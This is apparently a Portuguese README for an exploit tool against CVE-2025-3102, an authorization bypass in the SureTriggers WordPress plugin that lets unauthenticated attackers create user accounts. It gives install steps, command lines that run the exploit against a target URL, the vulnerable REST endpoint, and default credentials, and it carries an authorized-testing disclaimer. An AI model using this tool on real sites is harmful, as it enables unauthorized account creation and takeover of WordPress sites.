
SureTriggers <= 1.0.78 - Exploit de Bypass de Autorização
Esta ferramenta explora uma vulnerabilidade de bypass de autorização no plugin WordPress SureTriggers (versões <= 1.0.78), permitindo que atacantes não autenticados criem novas contas de usuário no WordPress.
🔥 Desenvolvido por 0xgh057r3c0n
requests, coloramaInstalar dependências:
pip3 install -r requirements.txt
Ou manualmente:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizado. O acesso não autorizado a sistemas é ilegal e punível por lei. O autor não se responsabiliza por qualquer uso indevido ou dano causado.
| Argumento | Descrição | Padrão |
|---|
-u, --url | URL base do site WordPress | Obrigatório |
--newmail | Endereço de e-mail para o novo usuário | [email protected] |
--newuser | Nome de usuário a criar | 0xgh057r3c0n |
--newpassword | Senha para o novo usuário | Wiz007@8876@ |